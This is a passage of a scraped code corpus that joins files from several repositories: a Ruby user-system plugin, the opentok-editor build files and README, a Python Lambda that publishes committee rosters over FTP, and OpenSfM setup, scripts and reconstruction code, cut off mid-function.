    def to_model(str_or_model, model_class, finder)
      if str_or_model.is_a?(model_class)
        str_or_model
      else
        model_class.send(finder, str_or_model.downcase)
      end
    end

    # internal helper
    def userify(str_or_user)
      to_model(str_or_user, user_model_for_this_controller, :find_by_name)
    end

    def auth_module_for_this_controller
      read_inheritable_attribute(:auth_module)
    end

    def session_model_for_this_controller
      read_inheritable_attribute(:session_model) || Session
    end

    def user_model_for_this_controller
      atr = read_inheritable_attribute(:user_model)
      atr ? atr.to_s.camelize.constantize : User
    end
  end
end
<file_sep># Copyright (c) 2009 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# Runs this plugin's migrations against a dedicated schema-tracking table so
# the plugin's versions do not collide with the host app's schema_migrations.
class UserSystemMigrator < ActiveRecord::Migrator
  def initialize direction, migrations_path, target_version=nil
    unless ActiveRecord::Base.connection.supports_migrations?
      raise StandardError.new("This database does not yet support migrations")
    end
    initialize_schema_migrations_table(ActiveRecord::Base.connection)
    @direction, @migrations_path, @target_version = direction, migrations_path, target_version
  end

  # Name of the plugin-private migrations bookkeeping table.
  def self.schema_migrations_table_name
    'plugin_schema_migrations_user_system'
  end

  private

  # Create the plugin's migrations table (with a unique version index) if it
  # does not already exist.
  def initialize_schema_migrations_table connection
    name = self.class.schema_migrations_table_name
    return if connection.tables.detect{|t| t == name}
    connection.create_table(name, :id => false) do |t|
      t.column :version, :string, :null => false
    end
    connection.add_index(
      name,
      :version,
      :unique => true,
      :name => "unique_schema_usersystem"
    )
  end
end
<file_sep>##
# A session controls access for a user
#
class Session < ActiveRecord::Base
  # The account this session grants access for.
  belongs_to :user
end
| 8525279e5db0cc1720752f423ad96df83dec0b0d | [
"Ruby"
] | 17 | Ruby | rubidine/user_system | 17c81dfd8248db9ced7ff46cbcd79d4f1245807e | 13fef855b89e1fd0bf2a74a66bce631f1fb12a39 |
refs/heads/master | <file_sep>var gulp = require('gulp'),
bower = require('gulp-bower'),
jshint = require('gulp-jshint'),
rename = require('gulp-rename'),
concat = require('gulp-concat'),
uglify = require('gulp-uglify');
// Fetch the front-end dependencies declared in bower.json.
gulp.task('bower', function () {
  return bower();
});
gulp.task('default', ['bower'], function() {
gulp.src(['bower_components/ot/dist/ot.js', 'bower_components/ot/lib/server.js', 'src/*.js'])
.pipe(jshint())
.pipe(concat('opentok-editor.js'))
.pipe(gulp.dest('./'))
.pipe(uglify({preserveComments: "some"}))
.pipe(rename('opentok-editor.min.js'))
.pipe(gulp.dest('./'));
});<file_sep>[](https://travis-ci.org/aullman/opentok-editor)
[](https://codeclimate.com/github/aullman/opentok-editor)
[](https://codeclimate.com/github/aullman/opentok-editor)
# opentok-editor
A real time collaborative editor for OpenTok using CodeMirror and ot.js. More information in [this blog article](http://www.tokbox.com/blog/collaborative-editor/).
## Installation
### npm with webpack or browserify:
`npm install opentok-editor`
```js
require('opentok-editor');
require('opentok-editor/opentok-editor.css');
```
### [Bower](http://bower.io/):
`bower install opentok-editor`
or clone this repo and include the `opentok-editor.js` or `opentok-editor.min.js` file.
## Usage
See [index.html](index.html). You will need to replace the values for API_KEY, SESSION_ID and TOKEN with values using your [OpenTok](https://www.tokbox.com/opentok) account. Then you can run `npm start` and go to localhost:8080 in your browser.
## How to Build Yourself
Keep all custom changes to the `src/` files and then run:
```
npm install
```
Which will install all bower components and run the gulp build to build the `opentok-editor.js` and `opentok-editor.min.js` files.
| 97ddd1af84eadaa1a4dce6c8f8c981fdfdbf26da | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | aullman/opentok-editor | 9165cefbdd4c75d2e3771d312400bddf77357601 | cce3d384adf1bc7565341a6b01a2c4221f12d2aa |
refs/heads/master | <file_sep># tmo-committee-data
Process TMO Committee Data and publish it to the web.
<file_sep>import os
import pandas
from configparser import ConfigParser
from ftplib import FTP
def lambda_handler(event, context):
    """AWS Lambda entry point.

    Pulls committee signup rows from a Google Sheet (CSV export URL read
    from config.txt), writes a full member roster plus one roster per
    target committee as CSV and HTML, and uploads every file to the
    configured FTP host.  ``event`` and ``context`` follow the Lambda
    calling convention and are not used.
    """
    # read the config file and assign values
    print("### Read the config file and assign values")
    config = ConfigParser()
    config.read('config.txt')
    gsheet_url = config.get('gsheet','url')
    ftp_host = config.get('ftp','host')
    ftp_user = config.get('ftp','user')
    ftp_pass = config.get('ftp','pass')
    work_dir = config.get('local','dir')

    # check for the working directory and create it if needed
    print("### Check for the local directory and create it if needed")
    if not os.path.exists(work_dir):
        os.makedirs(work_dir)

    # change directory to the working directory
    print("### Change to the local directory")
    os.chdir(work_dir)

    # remove the column bounds so frames are not wrapped when printed
    pandas.set_option('display.expand_frame_repr', False)

    # get the data or die
    print("### Get the data from Google Sheets")
    p = pandas.read_csv(gsheet_url)

    # open ftp or die
    print("### Open a connection to the FTP host")
    ftp = FTP(ftp_host)
    ftp.login(ftp_user, ftp_pass)

    # FIX: the original leaked every local file handle it opened for upload
    # and never closed the FTP connection; use `with` blocks and try/finally.
    try:
        # incoming columns: 0 Timestamp, 1 First Name, 2 Last Name,
        # 3 Phone Number, 4 Phone Number Type, 5 Preferred Email Address,
        # 6 Contact Preference, 7 Target Committees
        target_committees = [
            "Target 1: HBCU for Life: A Call to Action",
            "Target 2: Women's Healthcare and Wellness",
            "Target 3: Building Your Economic Legacy",
            "Target 4: The Arts!",
            "Target 5: Global Impact",
            "Signature Program: #CAP (College Admissions Process)",
        ]

        # simplify the column names
        print("### Simplify the column names")
        p.rename(columns={'Phone Number (in xxx-xxx-xxxx format)':'Phone Number'}, inplace=True)
        p.rename(columns={'Target Committees (select at least one)':'Target Committees'}, inplace=True)

        # drop duplicates by email address
        print("### Drop duplicates by email address")
        p.drop_duplicates('Preferred Email Address', inplace=True)

        # process all member details, sorted by last name
        print("### Process all member details, sorted by last name")
        # hoist the shared slice/sort instead of recomputing it per output
        members = p.iloc[:, 1:9].sort_values(by=['Last Name'], ascending=True)
        members.to_csv('members.csv')
        members.to_html('members.html')
        with open('members.html', 'rb') as fh:
            ftp.storbinary('STOR ' + 'members.html', fh)
        with open('members.csv', 'rb') as fh:
            ftp.storbinary('STOR ' + 'members.csv', fh)

        # process target committees with member details
        print("### Process target committees with member details")
        for committee in target_committees:
            # output file name = committee name stripped to alphanumerics
            committee_filename = ''.join(e for e in committee if e.isalnum())
            pslice = p[ p['Target Committees'].str.contains(committee, na=False) ]
            roster = pslice.iloc[:, 1:9].sort_values(by=['Last Name'], ascending=True)
            roster.to_csv(committee_filename + '.csv')
            roster.to_html(committee_filename + '.html')
            # keep the original transfer call (storlines) for these files
            with open(committee_filename + '.html', 'rb') as fh:
                ftp.storlines('STOR ' + committee_filename + '.html', fh)
            with open(committee_filename + '.csv', 'rb') as fh:
                ftp.storlines('STOR ' + committee_filename + '.csv', fh)
    finally:
        ftp.quit()
if __name__ == '__main__':
lambda_handler(None, 'handler') | 471572e62c02b54c5c2e3e155e5da26438b0affb | [
"Markdown",
"Python"
] | 2 | Markdown | managedkaos/tmo-committee-data | f41180ac36acf2184bdf5cec506f661fb47f77ae | c4988c5554022b384b1b43031606c4df08059530 |
refs/heads/master | <file_sep>#!/usr/bin/env python
from distutils.core import setup, Extension
import numpy as np
import os
import glob
# Directories always searched for headers, extended by $CPLUS_INCLUDE_PATH
# (colon-separated) when it is set.
default_include_dirs = [
    '/usr/local/include',
    '/usr/include',
]
cplus_include_path = os.getenv('CPLUS_INCLUDE_PATH', '')
if cplus_include_path:
    default_include_dirs.extend(cplus_include_path.split(':'))
def find_path(name, hints, path_suffixes=[]):
suffixes = [''] + path_suffixes
for c in hints:
for s in suffixes:
path = os.path.join(c, s)
if os.path.isfile(os.path.join(path, name)):
return path
return None
def find_include(name, hints, path_suffixes=[]):
    # Like find_path, but always also searches the default system include
    # directories (and any from $CPLUS_INCLUDE_PATH) after the given hints.
    return find_path(name, hints + default_include_dirs, path_suffixes)
# Libraries the csfm extension links against, plus bundled third-party
# sources built as static helper libraries (akaze, libmv, vlfeat).
libraries = []
library_dirs = ['/usr/local/lib']

# Eigen
eigen_include_dir = find_include('Eigen/Core', [], ['eigen3'])

# Ceres
ceres_libraries = ['ceres', 'glog', 'gflags']
libraries.extend(ceres_libraries)

# Boost Python
boost_python_libraries = ['boost_python']
libraries.extend(boost_python_libraries)

# Akaze
akaze_include_dir = 'opensfm/src/third_party/akaze/lib'
akaze_sources = [
    'opensfm/src/third_party/akaze/lib/AKAZE.cpp',
    'opensfm/src/third_party/akaze/lib/fed.cpp',
    'opensfm/src/third_party/akaze/lib/nldiffusion_functions.cpp',
    'opensfm/src/third_party/akaze/lib/utils.cpp',
]
akaze_depends = [
    'opensfm/src/third_party/akaze/lib/AKAZEConfig.h',
    'opensfm/src/third_party/akaze/lib/AKAZE.h',
    'opensfm/src/third_party/akaze/lib/fed.h',
    'opensfm/src/third_party/akaze/lib/nldiffusion_functions.h',
    'opensfm/src/third_party/akaze/lib/utils.h',
]
akaze_library = ('akaze', {
    'sources': akaze_sources,
    'depends': akaze_depends,
    'include_dirs': [akaze_include_dir],
})

# libmv
libmv_include_dir = 'opensfm/src/third_party'
libmv_sources = [
    'opensfm/src/third_party/libmv/multiview/fundamental.cc',
    'opensfm/src/third_party/libmv/multiview/projection.cc',
    'opensfm/src/third_party/libmv/multiview/five_point.cc',
    'opensfm/src/third_party/libmv/multiview/robust_five_point.cc',
    'opensfm/src/third_party/libmv/multiview/triangulation.cc',
    'opensfm/src/third_party/libmv/multiview/conditioning.cc',
    'opensfm/src/third_party/libmv/numeric/numeric.cc',
    'opensfm/src/third_party/libmv/numeric/poly.cc',
]
libmv_library = ('mv', {
    'sources': libmv_sources,
    'include_dirs': [libmv_include_dir, eigen_include_dir],
})

# VLFeat
vlfeat_include_dir = 'opensfm/src/third_party/vlfeat'
vlfeat_sources = glob.glob('opensfm/src/third_party/vlfeat/vl/*.c')
vlfeat_depends = glob.glob('opensfm/src/third_party/vlfeat/vl/*.h')
vlfeat_library = ('vl', {
    'sources': vlfeat_sources,
    'depends': vlfeat_depends,
    'macros': [('VL_DISABLE_AVX', '1')],
})

# cSfM: the Python extension module itself
csfm_extension = Extension(
    'opensfm.csfm',
    sources=['opensfm/src/csfm.cc'],
    depends=['bundle.h'],
    include_dirs=[
        np.get_include(),
        eigen_include_dir,
        libmv_include_dir,
        akaze_include_dir,
        vlfeat_include_dir,
    ],
    libraries=libraries,
    library_dirs = library_dirs,
    extra_compile_args=['-std=c++11'],
)

setup(
    name='OpenSfM',
    version='0.1',
    description='A Structure from Motion library',
    url='https://github.com/mapillary/OpenSfM',
    author='Mapillary',
    license='BSD',
    packages=['opensfm'],
    libraries=[vlfeat_library, libmv_library, akaze_library],
    ext_modules=[csfm_extension],
)
<file_sep>import numpy as np
import json
import cv2
# pairwise matches
def match_lowe(index, f2, config):
    """Match descriptors f2 against a prebuilt FLANN index using Lowe's
    ratio test; returns an (N, 2) int array of (index-feature, f2-feature)
    index pairs.
    """
    search_params = dict(checks=config.get('flann_checks', 200))
    results, dists = index.knnSearch(f2, 2, params=search_params)
    # keep a match only when the best distance clearly beats the 2nd best
    good = dists[:, 0] < config.get('lowes_ratio', 0.6) * dists[:, 1]
    # NOTE(review): assumes Python 2 where zip() returns a list; wrap in
    # list() before np.array if this is ever ported to Python 3.
    matches = zip(results[good, 0], good.nonzero()[0])
    return np.array(matches, dtype=int)
def match_symmetric(fi, indexi, fj, indexj, config):
    """Keep only matches found in both directions (i->j and j->i),
    using FLANN or brute-force matching per the config."""
    if config.get('matcher_type', 'FLANN') == 'FLANN':
        ij = match_lowe(indexi, fj, config)
        ji = match_lowe(indexj, fi, config)
    else:
        ij = match_lowe_bf(fi, fj, config)
        ji = match_lowe_bf(fj, fi, config)
    forward = set((a, b) for a, b in ij)
    backward = set((b, a) for a, b in ji)
    return np.array(list(forward & backward), dtype=int)
def convert_matches_to_vector(matches):
    '''Convert a list of cv2.DMatch-like objects to an (N, 2) integer array
    of (queryIdx, trainIdx) pairs.
    '''
    # FIX: np.int was deprecated in NumPy 1.20 and removed in 1.24; plain
    # int selects the same default integer dtype.
    matches_vector = np.zeros((len(matches), 2), dtype=int)
    # enumerate replaces the original hand-maintained counter
    for k, mm in enumerate(matches):
        matches_vector[k, 0] = mm.queryIdx
        matches_vector[k, 1] = mm.trainIdx
    return matches_vector
def match_lowe_bf(f1, f2, config):
    '''Bruteforce feature matching of f1 against f2 with Lowe's ratio test;
    returns an (N, 2) int array of (f1-index, f2-index) pairs.
    '''
    assert(f1.dtype.type==f2.dtype.type)
    # Hamming distance for binary (uint8) descriptors, L2 otherwise.
    if (f1.dtype.type == np.uint8):
        matcher_type = 'BruteForce-Hamming'
    else:
        matcher_type = 'BruteForce'
    matcher = cv2.DescriptorMatcher_create(matcher_type)
    matches = matcher.knnMatch(f1, f2, k=2 )
    good_matches = []
    for m,n in matches:
        # ratio test: best match must clearly beat the second best
        if m.distance < config.get('lowes_ratio', 0.6)*n.distance:
            good_matches.append(m)
    good_matches = convert_matches_to_vector(good_matches)
    return np.array(good_matches, dtype=int)
def robust_match(p1, p2, matches, config):
    '''Computes robust matches by estimating the Fundamental matrix via RANSAC.

    p1/p2 are the full feature arrays for each image; `matches` indexes into
    them.  Returns the subset of matches that are RANSAC inliers.
    '''
    # the 8-point algorithm needs at least 8 correspondences
    if len(matches) < 8:
        return np.array([])
    p1 = p1[matches[:, 0]][:, :2].copy()
    p2 = p2[matches[:, 1]][:, :2].copy()
    # NOTE(review): cv2.cv.CV_FM_RANSAC is the OpenCV 2.x constant; OpenCV 3+
    # exposes it as cv2.FM_RANSAC.
    F, mask = cv2.findFundamentalMat(p1, p2, cv2.cv.CV_FM_RANSAC, config.get('robust_matching_threshold', 0.006), 0.99)
    inliers = mask.ravel().nonzero()
    return matches[inliers]
<file_sep>#!/usr/bin/env bash
# Move a dataset's derived files (reconstructions, features, metadata) into
# a timestamped trash directory under "$1/trash" instead of deleting them.
trash=$1/trash/`date -u +"%Y-%m-%dT%H:%M:%SZ"`
mkdir -p $trash
# NOTE(review): this clears ./trash/* relative to the current working
# directory, not "$trash"/* — confirm the intended target.
rm -rf trash/*
mv -vf $1/reconstruction*.json $trash
mv -vf $1/exif $trash
mv -vf $1/robust_matches $trash
mv -vf $1/sift $trash
mv -vf $1/surf $trash
mv -vf $1/akaze* $trash
mv -vf $1/root* $trash
mv -vf $1/hahog $trash
mv -vf $1/camera_models.json $trash
mv -vf $1/reference_lla.json $trash
mv -vf $1/profile.log $trash
mv -vf $1/navigation_graph.json $trash
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import numpy as np
from itertools import combinations
import argparse
import networkx as nx
from opensfm import dataset
from opensfm import features
import logging
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)
def good_track(track, min_length):
    """Return True when a track has at least min_length observations and
    never observes the same image twice (one feature per image)."""
    if len(track) < min_length:
        return False
    images = [observation[0] for observation in track]
    return len(images) == len(set(images))
# Build a bipartite image/track graph: connect matched features across all
# image pairs, take connected components as candidate tracks, filter them
# with good_track, and save the result.
parser = argparse.ArgumentParser(description='Create tracks by grouping the robust matches')
parser.add_argument('dataset',
                    help='path to the dataset to be processed')
args = parser.parse_args()

data = dataset.DataSet(args.dataset)
images = data.images()

# Read local features
logging.info('reading features')
feature = {}
for im in images:
    p1, f1 = data.load_features(im)
    # keep only the (x, y) coordinates of each feature
    feature[im] = p1[:,:2]

logging.info('creating features graph')
g = nx.Graph()
for im1 in images:
    for im2 in images:
        try:
            matches = data.load_matches(im1, im2)
            for f1, f2 in matches:
                g.add_edge((im1, f1), (im2, f2))
        except IOError:
            # no match file for this pair; skip it
            pass

logging.info('finding connected components')
tracks = nx.connected_components(g)
tracks = [t for t in tracks if good_track(t, data.config.get('min_track_length', 2))]
logging.info('Good tracks: %d', len(tracks))

# Bipartite graph: images on one side (bipartite=0), tracks on the other,
# with the observed feature coordinates stored on each edge.
tracks_graph = nx.Graph()
for track_id, track in enumerate(tracks):
    for image_feature in track:
        image = image_feature[0]
        featureid = image_feature[1]
        x, y = feature[image][featureid]
        tracks_graph.add_node(image, bipartite=0)
        tracks_graph.add_node(track_id, bipartite=1)
        tracks_graph.add_edge(image, track_id, feature=(x,y), feature_id=featureid)

data.save_tracks_graph(tracks_graph)
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import argparse
import time
import json
import numpy as np
import scipy.spatial
from opensfm import dataset
from opensfm import reconstruction
if __name__ == "__main__":
    start = time.time()
    parser = argparse.ArgumentParser(description='Add delaunay mesh to the reconstruction')
    parser.add_argument('dataset',
                        help='path to the dataset to be processed')
    args = parser.parse_args()

    data = dataset.DataSet(args.dataset)
    graph = data.load_tracks_graph()
    reconstructions = data.load_reconstruction()

    for r in reconstructions:
        for shot_id, shot in r['shots'].items():
            if shot_id not in graph:
                continue
            cam = r['cameras'][shot['camera']]
            # half-extents of the image in normalized coordinates (scaled by
            # the larger image dimension)
            dx = float(cam['width']) / 2 / max(cam['width'], cam['height'])
            dy = float(cam['height']) / 2 / max(cam['width'], cam['height'])
            # pixels holds the 4 image corners first, then each visible
            # reconstructed point reprojected into this shot; vertices holds
            # placeholders for the corners followed by the 3D points
            pixels = [[-dx, -dy], [-dx, dy], [dx, dy], [dx, -dy]]
            vertices = [None for i in range(4)]
            for track_id, edge in graph[shot_id].items():
                if track_id in r['points']:
                    point = r['points'][track_id]
                    vertices.append(point['coordinates'])
                    pixel = reconstruction.reproject(cam, shot, point)
                    pixels.append(pixel.tolist())

            # 2D Delaunay triangulation over corners + reprojected points
            tri = scipy.spatial.Delaunay(pixels)

            # give each image corner the average camera-space depth of the
            # real points that share a triangle with it
            sums = [0.,0.,0.,0.]
            depths = [0.,0.,0.,0.]
            for t in tri.simplices:
                for i in range(4):
                    if i in t:
                        for j in t:
                            if j >= 4:
                                depths[i] += reconstruction.camera_coordinates(cam, shot, vertices[j])[2]
                                sums[i] += 1
            # NOTE(review): sums[i] can be 0 if a corner shares no triangle
            # with any reconstructed point, which would divide by zero here.
            for i in range(4):
                vertices[i] = reconstruction.back_project(cam, shot, pixels[i], depths[i] / sums[i]).tolist()

            faces = tri.simplices.tolist()
            r['shots'][shot_id]['vertices'] = vertices
            r['shots'][shot_id]['faces'] = faces

    data.save_reconstruction(reconstructions, filename='reconstruction.meshed.json')

    end = time.time()
    with open(data.profile_log(), 'a') as fout:
        fout.write('mesh: {0}\n'.format(end - start))
<file_sep>#!/usr/bin/env python
import argparse
import matplotlib.pyplot as pl
import networkx as nx
import numpy as np
from networkx.algorithms import bipartite
from itertools import combinations
from opensfm import dataset
from opensfm import features
from opensfm import reconstruction
from opensfm import io
def plot_features(image, points):
    """Overlay normalized feature positions as blue dots on an image."""
    height, width, _ = image.shape
    denorm = features.denormalized_image_coordinates(points, width, height)
    pl.imshow(image)
    pl.plot(denorm[:, 0], denorm[:, 1], 'ob')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Compute reconstruction')
parser.add_argument('dataset',
help='path to the dataset to be processed')
parser.add_argument('--image',
help='name of the image to show')
parser.add_argument('--save_figs',
help='save figures istead of showing them',
action='store_true')
args = parser.parse_args()
data = dataset.DataSet(args.dataset)
if not args.image:
for image in data.images():
points, desc = data.load_featurs(image)
print "ploting {0} points".format(len(points))
pl.figure()
plot_features(data.image_as_array(image), points)
if args.save_figs:
p = args.dataset + '/plot_features'
io.mkdir_p(p)
pl.savefig(p + '/' + image + '.jpg')
pl.close()
else:
pl.show()
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import json
import exifread
import time
import numpy as np
from cv2 import imread
from opensfm.sensors import sensor_data
from opensfm import dataset
from opensfm import exif
def usage():
print 'USAGE: %s data_set_path' % sys.argv[0]
sys.exit(0)
# Extract per-image EXIF metadata (size, maker, focal length, GPS,
# orientation) and derive the dataset's camera model list.
if len(sys.argv) > 1:
    path = sys.argv[1]
else:
    usage()

start = time.time()
data = dataset.DataSet(path)
images = data.images()

# Sensors whose focal length could not be resolved, keyed by sensor string.
missing_sensors = {}
camera_models = {}

# Optional side-channel EXIF data shipped with the dataset.
if os.path.exists(data.data_path + '/imagedata.json'):
    with open(data.data_path + '/imagedata.json', 'rb') as f:
        exif_database = json.loads(f.read())
else:
    exif_database = {}

# Optional per-image user overrides, applied last.
if os.path.exists(data.data_path + '/exif_overrides.json'):
    with open(data.data_path + '/exif_overrides.json', 'rb') as f:
        exif_overrides = json.loads(f.read())
else:
    exif_overrides = {}

for image in images:
    print 'Extracting focal lengths for image', image

    # EXIF data in Image
    exif_data = exif.EXIF(data.load_image(image))

    # Image Height and Image Width
    if data.config.get('use_exif_size', True):
        width, height = exif_data.extract_image_size()
    else:
        # Fall back to decoding the image itself.
        height, width = data.image_as_array(image).shape[:2]

    # Make and Model
    make, model = exif_data.extract_make(), exif_data.extract_model()
    sensor_string = exif.sensor_string(make, model)

    # Focal
    focal_35, focal_ratio = exif_data.extract_focal()
    if focal_ratio == 0:
        # try reading data from exif database (imagedata.json) if exist
        exif_image = exif_database.get(image)
        if exif_image:
            model = exif_image.get('model', 'unknown')
            make = exif_image.get('make', 'unknown')
            sensor_string = exif.sensor_string(make, model)
            fmm35, fmm = float(exif_image.get('fmm35', 0)), float(exif_image.get('fmm', 0))
            focal_35, focal_ratio = exif.compute_focal(
                fmm35,
                fmm,
                None,
                sensor_string
            )
        if focal_ratio == 0:
            # Still unresolved: record the sensor as missing.
            missing_sensors[exif.sensor_string(make, model)] = 1

    orientation = exif_data.extract_orientation()

    d = {
        'width': width,
        'height': height,
        'focal_ratio': focal_ratio,
        'focal_35mm_equiv': focal_35,
        'camera': sensor_string,
        'orientation': orientation
    }

    # GPS
    geo = exif_data.extract_geo()
    if exif_database.get(image, {}):
        # Check whether gps is provided in a json file (imagedata.json)
        exif_image = exif_database[image]
        d['gps'] = {}
        d['gps']['latitude'] = float(exif_image.get('lat', 0.0))
        d['gps']['longitude'] = float(exif_image.get('lon', 0.0))
        d['gps']['altitude'] = float(exif_image.get('altitude', 0.0))
        d['gps']['dop'] = float(exif_image.get('gps_accuracy', -1))
        if d['gps']['dop'] < 0:
            # Negative accuracy means "unknown": drop the field.
            del d['gps']['dop']
    elif 'latitude' in geo and 'longitude' in geo:
        d['gps'] = geo

    if image in exif_overrides:
        for key, value in exif_overrides[image].items():
            d[key] = value

    # The first image seen for a sensor defines its camera model.
    if sensor_string not in camera_models:
        camera_models[d['camera']] = {
            'width': d['width'],
            'height': d['height'],
            'focal_ratio': d['focal_ratio'],
            'focal_35mm_equiv': d['focal_35mm_equiv'],
            "focal": d['focal_ratio'],
            "exif_focal": d['focal_ratio']
        }

    distortion = exif_data.extract_distortion()
    if distortion is not None:
        camera_models[d['camera']].update({'k1': distortion[0], 'k2': distortion[1]})
        d.update({'k1': distortion[0], 'k2': distortion[1]})

    data.save_exif(image, d)

with open(data.data_path + '/missing_sensor.json', 'w') as fout:
    fout.write(json.dumps(missing_sensors, indent=4))

data.save_camera_models(camera_models)

end = time.time()
with open(data.profile_log(), 'a') as fout:
    fout.write('focal_from_exif: {0}\n'.format(end - start))
<file_sep>#!/usr/bin/env bash
# Run the full pipeline on the dataset given as $1:
# EXIF -> feature detection -> matching -> tracks -> reconstruction.
set -e

# Absolute directory of this script, so sibling tools resolve regardless
# of the caller's working directory.
DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )

# Fix: quote the dataset path and script dir so paths containing spaces
# survive word splitting and globbing.
"$DIR/focal_from_exif" "$1"
"$DIR/detect_features" "$1"
"$DIR/match_features" "$1"
"$DIR/create_tracks" "$1"
"$DIR/reconstruct" "$1"
<file_sep># -*- coding: utf-8 -*-
from collections import defaultdict
from itertools import combinations
import os
from subprocess import call, Popen, PIPE
import tempfile
import datetime
from itertools import combinations
import numpy as np
import cv2
import json
import time
import networkx as nx
from networkx.algorithms import bipartite
from opensfm import transformations as tf
from opensfm import dataset
from opensfm import features
from opensfm import multiview
from opensfm import geo
from opensfm import csfm
def bundle(graph, reconstruction, config):
    '''Bundle adjust a reconstruction.

    Loads cameras, shots and points into a csfm.BundleAdjuster, adds one
    observation per (shot, reconstructed track) pair, runs the solver,
    and writes the refined parameters back into the reconstruction dict
    in place.
    '''
    start = time.time()
    ba = csfm.BundleAdjuster()
    for k, v in reconstruction['cameras'].items():
        # focal/k1/k2 are optimized; exif_focal serves as the focal prior.
        ba.add_camera(str(k), v['focal'], v['k1'], v['k2'],
                      v['exif_focal'], False)
    for k, v in reconstruction['shots'].items():
        r = v['rotation']
        t = v['translation']
        g = v['gps_position']
        ba.add_shot(
            str(k), str(v['camera']),
            r[0], r[1], r[2],
            t[0], t[1], t[2],
            g[0], g[1], g[2],
            v['gps_dop'], False
        )
    for k, v in reconstruction['points'].items():
        x = v['coordinates']
        ba.add_point(str(k), x[0], x[1], x[2], False)

    # One observation per (shot, reconstructed track) edge in the graph.
    for shot in reconstruction['shots']:
        for track in graph[shot]:
            if track in reconstruction['points']:
                ba.add_observation(str(shot), str(track), *graph[shot][track]['feature'])

    # Robust loss caps the influence of outlier observations.
    ba.set_loss_function(config.get('loss_function', 'TruncatedLoss'),
                         config.get('loss_function_threshold', 0.004));
    ba.set_reprojection_error_sd(config.get('reprojection_error_sd', 1))
    ba.set_focal_prior_sd(config.get('exif_focal_sd', 999));
    setup = time.time()
    ba.run()
    print ba.brief_report()
    run = time.time()

    # Copy optimized parameters back into the reconstruction dict.
    for k, v in reconstruction['cameras'].items():
        c = ba.get_camera(str(k))
        v['focal'] = c.focal
        v['k1'] = c.k1
        v['k2'] = c.k2
    for k, v in reconstruction['shots'].items():
        s = ba.get_shot(str(k))
        v['rotation'] = [s.rx, s.ry, s.rz]
        v['translation'] = [s.tx, s.ty, s.tz]
    for k, v in reconstruction['points'].items():
        p = ba.get_point(str(k))
        v['coordinates'] = [p.x, p.y, p.z]
    teardown = time.time()
    print 'setup/run/teardown {0}/{1}/{2}'.format(setup - start, run - setup, teardown - run)
def pairwise_reconstructability(common_tracks, homography_inliers):
    """Score how suitable an image pair is for seeding a reconstruction.

    A pair whose matches are poorly explained by a single homography
    (outlier ratio above 0.3) exhibits enough parallax to triangulate;
    such pairs score by their number of common tracks, all others 0.
    """
    outlier_ratio = (common_tracks - homography_inliers) / float(common_tracks)
    return common_tracks if outlier_ratio > 0.3 else 0
def compute_image_pairs(graph, image_graph, config):
    '''All matched image pairs sorted by reconstructability.

    Pairs with at least 100 common tracks are scored by how poorly a
    homography explains their matches (more parallax scores higher);
    pairs fully explained by a homography are discarded.  Returns the
    surviving pairs, best first.
    '''
    pairs = []
    score = []
    for im1, im2, d in image_graph.edges(data=True):
        tracks, p1, p2 = dataset.common_tracks(graph, im1, im2)
        if len(tracks) >= 100:
            H, inliers = cv2.findHomography(p1, p2, cv2.RANSAC, config.get('homography_threshold', 0.004))
            r = pairwise_reconstructability(len(tracks), inliers.sum())
            if r > 0:
                pairs.append((im1, im2))
                score.append(r)
    # Highest-scoring pairs first.
    order = np.argsort(-np.array(score))
    return [pairs[o] for o in order]
def add_gps_position(data, reconstruction, image):
    """Attach GPS-derived position priors to a shot.

    When the image EXIF carries GPS data, convert lat/lon to topocentric
    coordinates relative to the dataset reference; otherwise fall back
    to the origin with an effectively infinite DOP.
    """
    exif = data.load_exif(image)
    reflla = data.load_reference_lla()
    shot = reconstruction['shots'][image]
    if 'gps' in exif:
        lat = exif['gps']['latitude']
        lon = exif['gps']['longitude']
        alt = 2.0  # exif['gps'].get('altitude', 0)
        x, y, z = geo.topocentric_from_lla(lat, lon, alt, *reflla)
        shot['gps_position'] = [x, y, z]
        shot['gps_dop'] = exif['gps'].get('dop', 15.0)
    else:
        shot['gps_position'] = [0.0, 0.0, 0.0]
        shot['gps_dop'] = 999999.0

    shot['exif_orientation'] = exif.get('orientation', 1)
def bootstrap_reconstruction(data, graph, im1, im2):
    '''Starts a reconstruction using two shots.

    Runs the five-point algorithm on the pair's common tracks, seeds a
    reconstruction with im1 at the origin and im2 at the recovered
    relative pose, then triangulates.  Returns the reconstruction dict,
    or None when too few points could be triangulated.
    '''
    print 'Initial reconstruction with', im1, 'and', im2
    d1 = data.load_exif(im1)
    d2 = data.load_exif(im2)
    cameras = data.load_camera_models()

    tracks, p1, p2 = dataset.common_tracks(graph, im1, im2)
    print 'Number of common tracks', len(tracks)

    f1 = d1['focal_ratio']
    f2 = d2['focal_ratio']
    threshold = data.config.get('five_point_algo_threshold', 0.006)
    R, t, inliers = csfm.two_view_reconstruction(p1, p2, f1, f2, threshold)
    if len(inliers):
